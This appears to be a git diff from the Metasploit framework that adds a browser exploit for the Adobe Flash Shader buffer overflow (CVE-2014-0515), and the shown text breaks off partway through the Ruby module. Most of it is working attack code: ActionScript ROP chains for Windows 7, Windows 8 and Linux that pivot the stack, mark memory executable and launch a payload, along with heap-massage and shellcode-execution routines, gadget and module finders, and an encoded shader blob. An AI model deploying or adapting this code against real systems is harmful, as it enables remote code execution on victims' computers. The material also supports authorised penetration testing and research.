+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0515/Graph.as b/external/source/exploits/CVE-2014-0515/Graph.as
deleted file mode 100755
index ab64eb90cd..0000000000
--- a/external/source/exploits/CVE-2014-0515/Graph.as
+++ /dev/null
@@ -1,411 +0,0 @@
-//compile with AIR SDK 13.0: mxmlc Graph.as -o Graph.swf
-package {
-	import flash.display.Sprite;
-	import flash.utils.ByteArray;
-	import flash.display.Shader;
-	import flash.system.Capabilities;
-	import flash.net.FileReference;
-	import flash.utils.Endian;
-	import __AS3__.vec.Vector;
-	import __AS3__.vec.*;
-	import flash.display.LoaderInfo;
-	
-	public class Graph extends Sprite {
-		
-		static var counter:uint = 0;
-		
-		protected var Shad:Class;
-		var shellcode_byte_array:ByteArray;
-		var aaab:ByteArray;
-		var shellcodeObj:Array;
-		
-		public function Graph(){
-			var tweaked_vector:* = undefined;
-			var tweaked_vector_address:* = undefined;
-			var shader:Shader;
-			var flash_memory_protect:Array;
-			var code_vectors:Array;
-			var address_code_vector:uint;
-			var address_shellcode_byte_array:uint;
-			this.Shad = Graph_Shad;
-			super();
-			shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(",");
-			var i:* = 0;
-			var j:* = 0;
-			
-			// Just one try
-			counter++;
-			if (counter > 1)
-			{
-				return;
-			};
-			
-			// Memory massage
-			var array_length:uint = 0x10000;
-			var vector_size:uint = 34;
-			var array:Array = new Array();
-			i = 0;
-			while (i < array_length)
-			{
-				array[i] = new Vector.<int>(1);
-				i++;
-			};
-			i = 0;
-			while (i < array_length)
-			{
-				array[i] = new Vector.<int>(vector_size);
-				i++;
-			};
-			i = 0;
-			while (i < array_length)
-			{
-				array[i].length = 0;
-				i++;
-			};
-			i = 0x0200;
-			while (i < array_length)
-			{
-				array[(i - (2 * (j % 2)))].length = 0x0100;
-				i = (i + 28);
-				j++;
-			};
-			
-			// Overflow and Search for corrupted vector
-			var corrupted_vector_idx:uint;
-			var shadba:ByteArray = (new this.Shad() as ByteArray);
-			shadba.position = 232;
-			if (Capabilities.os.indexOf("Windows 8") >= 0)
-			{
-				shadba.writeUnsignedInt(2472);
-			};
-			shadba.position = 0;
-			while (1)
-			{
-				shader = new Shader();
-				try
-				{
-					shader.byteCode = (new this.Shad() as ByteArray);
-				} catch(e)
-				{
-				};
-				i = 0;
-				while (i < array_length)
-				{
-					if (array[i].length > 0x0100)
-					{
-						corrupted_vector_idx = i;
-						break;
-					};
-					i++;
-				};
-				if (i != array_length)
-				{
-					if (array[corrupted_vector_idx][(vector_size + 1)] > 0) break;
-				};
-				array.push(new Vector.<int>(vector_size));
-			};
-			
-			// Tweak the vector following the corrupted one
-			array[corrupted_vector_idx][vector_size] = 0x40000001;
-			tweaked_vector = array[(corrupted_vector_idx + 1)];
-			
-			// repair the corrupted vector by restoring its
-			// vector object pointer and length
-			var vector_obj_addr:* = tweaked_vector[0x3fffffff];
-			tweaked_vector[((0x40000000 - vector_size) - 3)] = vector_obj_addr;
-			tweaked_vector[((0x40000000 - vector_size) - 4)] = vector_size;
-			i = 0;
-			var val:uint;
-			while (true)
-			{
-				val = tweaked_vector[(0x40000000 - i)];
-				if (val == 0x90001B) break;
-				i++;
-			};
-			tweaked_vector_address = 0;
-			if (tweaked_vector[((0x40000000 - i) - 4)] > 0)
-			{
-				tweaked_vector[4] = 0x41414141;
-				tweaked_vector_address = ((tweaked_vector[((0x40000000 - i) - 4)] + (8 * (vector_size + 2))) + 8);				
-			};
-			
-			// More memory massage, fill an array of FileReference objects
-			var file_reference_array:Array = new Array();
-			i = 0;
-			while (i < 64)
-			{
-				file_reference_array[i] = new FileReference();
-				i++;
-			};
-			
-			var file_reference_vftable:uint = this.find_file_ref_vtable(tweaked_vector, tweaked_vector_address);
-			var cancel_address:uint = this.read_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20));
-			var do_it:Boolean = true;
-			var memory_protect_ptr:uint;
-			var aaaq:uint;
-			if (do_it)
-			{
-				flash_memory_protect = this.findFlashMemoryProtect(tweaked_vector, tweaked_vector_address);
-				memory_protect_ptr = flash_memory_protect[0];
-				aaaq = flash_memory_protect[1]; // Not sure, not used on the Flash 11.7.700.202 analysis, maybe some type of adjustment
-				code_vectors = this.createCodeVectors(0x45454545, 0x90909090);
-				address_code_vector = this.findCodeVector(tweaked_vector, tweaked_vector_address, 0x45454545);
-				this.fillCodeVectors(code_vectors);
-				tweaked_vector[7] = (memory_protect_ptr + 0); // Flash VirtualProtect call
-				tweaked_vector[4] = aaaq; 				
-				tweaked_vector[0] = 0x1000; // Length
-				tweaked_vector[1] = (address_code_vector & 0xFFFFF000); // Address
-				
-				// 10255e21 ff5014          call    dword ptr [eax+14h]  ds:0023:41414155=????????
-				this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), (tweaked_vector_address + 8));
-				
-				// 1) Set memory as executable
-				i = 0;
-				while (i < 64)
-				{
-					file_reference_array[i].cancel();
-					i++;
-				};
-				
-				// 2) Execute shellcode 
-				tweaked_vector[7] = address_code_vector;
-				i = 0;
-				while (i < 64)
-				{
-					file_reference_array[i].cancel();
-					i++;
-				};
-				
-				// Restore FileReference cancel function pointer
-				// Even when probably msf module is not going to benefit because of the ExitThread at the end of the payloads
-				this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), cancel_address);
-			};
-		}
-		
-		// returns the integer at memory address
-		// vector: vector with tweaked length
-		// vector_address: vector's memory address
-		// address: memory address to read
-		function read_memory(vector:Vector.<int>, vector_address:uint, address:uint):uint{
-			if (address >= vector_address)
-			{
-				return (vector[((address - vector_address) / 4)]);
-			};
-			return (vector[(0x40000000 - ((vector_address - address) / 4))]);
-		}
-		
-		function write_memory(vector:Vector.<int>, vector_address:uint, address:uint, value:uint){
-			if (address >= vector_address)
-			{
-				vector[((address - vector_address) / 4)] = value;
-			} else
-			{
-				vector[(0x40000000 - ((vector_address - address) / 4))] = value;
-			};
-		}
-		
-		function findFlashMemoryProtect(vector:*, vector_address:*):Array{
-			var content:uint;
-			var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c));
-			var index:uint;
-			var memory_protect_ptr:uint;
-			var _local_6:uint;
-			if (allocation >= vector_address)
-			{
-				index = ((allocation - vector_address) / 4);
-			} else
-			{
-				index = (0x40000000 - ((vector_address - allocation) / 4));
-			};
-			
-			//push    1 ; 6a 01
-			//push    dword ptr [eax-8] ; ff 70 f8
-			//push    dword ptr [eax-4] ; ff 70 fc
-			//call    sub_1059DD00 // Will do VirtualProtect
-			var offset:uint;
-			while (1)
-			{
-				index--;
-				content = vector[index];
-				if (content == 0xfff870ff)
-				{
-					offset = 2;
-					break;
-				};
-				if (content == 0xf870ff01)
-				{
-					offset = 1;
-					break;
-				};
-				if (content == 0x70ff016a)
-				{
-					content = vector[(index + 1)];
-					if (content == 0xfc70fff8)
-					{
-						offset = 0;
-						break;
-					};
-				} else
-				{
-					if (content == 0x70fff870)
-					{
-						offset = 3;
-						break;
-					};
-				};
-			};
-			
-			memory_protect_ptr = ((vector_address + (4 * index)) - offset);
-			index--;
-			var content_before:uint = vector[index];
-			
-			if (content_before == 0x16a0424)
-			{
-				return ([memory_protect_ptr, _local_6]);
-			};
-			if (content_before == 0x6a042444)
-			{
-				return ([memory_protect_ptr, _local_6]);
-			};
-			if (content_before == 0x424448b)
-			{
-				return ([memory_protect_ptr, _local_6]);
-			};
-			if (content_before == 0xff016a04)
-			{
-				return ([memory_protect_ptr, _local_6]);
-			};
-			_local_6 = (memory_protect_ptr - 6);
-			
-			while (1)
-			{
-				index--;
-				content = vector[index];
-				if (content == 0x850ff50)
-				{
-					if (uint(vector[(index + 1)]) == 0x5e0cc483)
-					{
-						offset = 0;
-						break;
-					};
-				};
-				content = (content & 0xFFFFFF00);
-				if (content == 0x50FF5000)
-				{
-					if (uint(vector[(index + 1)]) == 0xcc48308)
-					{
-						offset = 1;
-						break;
-					};
-				};
-				content = (content & 0xFFFF0000);
-				if (content == 0xFF500000)
-				{
-					if (uint(vector[(index + 1)]) == 0xc4830850)
-					{
-						if (uint(vector[(index + 2)]) == 0xc35d5e0c)
-						{
-							offset = 2;
-							break;
-						};
-					};
-				};
-				content = (content & 0xFF000000);
-				if (content == 0x50000000)
-				{
-					if (uint(vector[(index + 1)]) == 0x830850ff)
-					{
-						if (uint(vector[(index + 2)]) == 0x5d5e0cc4)
-						{
-							offset = 3;
-							break;
-						};
-					};
-				};
-			};
-			memory_protect_ptr = ((vector_address + (4 * index)) + offset);
-			return ([memory_protect_ptr, _local_6]);
-		}
-		
-		// vector: vector with tweaked length
-		// address: memory address of vector data
-		function find_file_ref_vtable(vector:*, address:*):uint{
-			var allocation:uint = this.read_memory(vector, address, ((address & 0xFFFFF000) + 0x1c));
-			
-			// Find an allocation of size 0x2a0
-			var allocation_size:uint;
-			while (true)
-			{
-				allocation_size = this.read_memory(vector, address, (allocation + 8));
-				if (allocation_size == 0x2a0) break;
-				if (allocation_size < 0x2a0)
-				{
-					allocation = (allocation + 0x24); // next allocation
-				} else
-				{
-					allocation = (allocation - 0x24); // prior allocation
-				};
-			};
-			var allocation_contents:uint = this.read_memory(vector, address, (allocation + 0xc));
-			while (true)
-			{
-				if (this.read_memory(vector, address, (allocation_contents + 0x180)) == 0xFFFFFFFF) break;
-				if (this.read_memory(vector, address, (allocation_contents + 0x17c)) == 0xFFFFFFFF) break;
-				allocation_contents = this.read_memory(vector, address, (allocation_contents + 8));
-			};
-			return (allocation_contents);
-		}
-		
-		// Returns pointer to the nops in one of the allocated code vectors
-		function findCodeVector(vector:*, vector_address:*, mark:*):uint{
-			var allocation_size:uint;
-			var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c));
-			while (true)
-			{
-				allocation_size = this.read_memory(vector, vector_address, (allocation + 8));
-				if (allocation_size == 0x7f0) break; // Code Vector found
-				allocation = (allocation + 0x24); // next allocation
-			};
-			
-			// allocation contents should be the vector code, search for the mark 0x45454545 
-			var allocation_contents:uint = this.read_memory(vector, vector_address, (allocation + 0xc));
-			while (true)
-			{
-				if (this.read_memory(vector, vector_address, (allocation_contents + 0x28)) == mark) break;
-				allocation_contents = this.read_memory(vector, vector_address, (allocation_contents + 8)); // next allocation
-			};
-			return ((allocation_contents + 0x2c));
-		}
-				
-		// create 8 vectors of size 0x7f0 inside an array to place shellcode 
-		function createCodeVectors(mark:uint, nops:uint){
-			var code_vectors_array:Array = new Array();
-			var i:* = 0;
-			while (i < 8)
-			{
-				code_vectors_array[i] = new Vector.<uint>(((0x7f0 / 4) - 8)); // new Vector.<uint>(0x1f4)
-				code_vectors_array[i][0] = mark; // 0x45454545 // inc ebp * 4
-				code_vectors_array[i][1] = nops; // 0x90909090 // nop * 4
-				i++;
-			};
-			return (code_vectors_array);
-		}
-		
-		
-		// Fill with the code vectors with the shellcode
-		function fillCodeVectors(array_code_vectors:Array) {
-			var i:uint = 0;
-			var sh:uint=1;
-			
-			while(i < array_code_vectors.length)
-			{	
-				for(var u:String in shellcodeObj)
-				{
-					array_code_vectors[i][sh++] = Number(shellcodeObj[u]); 
-				}
-				i++;
-				sh = 1;
-			}
-		}		
-	}
-}//package 
diff --git a/external/source/exploits/CVE-2014-0515/GraphShadLinux.as b/external/source/exploits/CVE-2014-0515/GraphShadLinux.as
new file mode 100755
index 0000000000..2593201484
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/GraphShadLinux.as
@@ -0,0 +1,10 @@
+package
+{
+	import mx.core.ByteArrayAsset;
+	
+	[Embed(source="binary_data_linux", mimeType="application/octet-stream")]
+	public class GraphShadLinux extends ByteArrayAsset
+	{
+
+	}
+}
diff --git a/external/source/exploits/CVE-2014-0515/GraphShadWindows.as b/external/source/exploits/CVE-2014-0515/GraphShadWindows.as
new file mode 100755
index 0000000000..e4f5f20453
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/GraphShadWindows.as
@@ -0,0 +1,10 @@
+package
+{
+	import mx.core.ByteArrayAsset;
+	
+	[Embed(source="binary_data_windows", mimeType="application/octet-stream")]
+	public class GraphShadWindows extends ByteArrayAsset
+	{
+
+	}
+}
diff --git a/external/source/exploits/CVE-2014-0515/Graph_Shad.as b/external/source/exploits/CVE-2014-0515/Graph_Shad.as
deleted file mode 100755
index c0e84dff5d..0000000000
--- a/external/source/exploits/CVE-2014-0515/Graph_Shad.as
+++ /dev/null
@@ -1,10 +0,0 @@
-package
-{
-	import mx.core.ByteArrayAsset;
-	
-	[Embed(source="binary_data", mimeType="application/octet-stream")]
-	public class Graph_Shad extends ByteArrayAsset
-	{
-
-	}
-}
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2014-0515/Logger.as b/external/source/exploits/CVE-2014-0515/Logger.as
new file mode 100755
index 0000000000..61ec768c25
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 1
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0515/PE.as b/external/source/exploits/CVE-2014-0515/PE.as
new file mode 100644
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0515/binary_data_linux b/external/source/exploits/CVE-2014-0515/binary_data_linux
new file mode 100755
index 0000000000000000000000000000000000000000..27a7ca7f9dff7ee5685f065e1bd6cb51fecbde39
GIT binary patch
literal 2425
zcmeH}L5tH+5Xb+?OHi<AysiY|;z?Mr?ds8HTk$05$(v|wUm@5{mn2<wJ>?{R0*}(I
zdKb^4yRwKMN7)ac|9N@ET2Z{nUivQ6nfK<+%rC>6zHtD&K8IeuUzEvcls?tdMwV>r
zVkhbAMRW9cKf0&OJdN(?;z^q64AaK0&IaQgn4aC$d6AAYIJ6FQ(a+PJQuKw3qm5xY
zDs_$n#|0V>?@r3zc$^QYGYhw1Y|NbPG`pXSCK{azq9%K_+Is=C6%HMmUA&E51aau%
zNFl&Ag>TdmIyh0dgxQ&a9ww7fS-WmcS>*ZWbnJF}T(`KkxVl{bqHoe&!mi|s!)f%v
z4fda`m0WQ+jXs$D@}iq}`W3t)@8iJr99$R_B|`B1MTM4&>NX;g@ux39OQGr%<$KEb
z!^`U(%IIb-1F?r5JjJ3yA1A<fDC$1-ML&B!vi`=8_eVBPAaUq_Bq_L*91q}VX!_LG
zU2Mwz48r}dP?WO2#(fzbCXU2cNW|_?ntaUuBjfMY`}7NBe}2CiJ(5S~*>K2s0ZWIH
zLzKe9#i4MBKG!?~ldtf2@NPqRe5~t?I<*YM{#PE>&z_I0zwvANs7xFmvBV*drsZKc
z2p^yIt@}7$<{_Nc)DjP#SHi<c!-xLlsc>w0G%YW~QFzOFax{Eg!#ltgh0DUZw)6Y^
zv|kkaRrUj?I!AX^5!)X}eBBT2Ht&fge}2b!&RKpgeqX8kw|YEVkCAmf^M3FoKid!g
KEC1!cC_ezeoEjMb

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2014-0515/binary_data b/external/source/exploits/CVE-2014-0515/binary_data_windows
similarity index 100%
rename from external/source/exploits/CVE-2014-0515/binary_data
rename to external/source/exploits/CVE-2014-0515/binary_data_windows
diff --git a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
new file mode 100644
index 0000000000..7265fba575
--- /dev/null
+++ b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Adobe Flash Player Shader Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
+        vulnerability occurs in the flash.Display.Shader class, when setting specially
+        crafted data as its bytecode, as exploited in the wild in April 2014. This module
+        has been tested successfully on:
+        * Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182.
+        * Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182
+        * Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182.
+        * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.350
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown', # Vulnerability discovery and exploit in the wild
+          'juan vazquez' # msf module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-0515'],
+          ['BID', '67092'],
+          ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],
+          ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],
+          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]
+        ],
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'            => ['win', 'linux'],
+      'Arch'                => [ARCH_X86],
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :arch    => ARCH_X86,
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::LINUX ||
+              os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda do |ua|
+            case target.name
+            when 'Windows'
+              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
+            when 'Linux'
+              return true if ua == Msf::HttpClients::FF
+            end
+
+            false
+          end,
+          :flash   => lambda do |ver|
+            case target.name
+            when 'Windows'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.7.700.275')
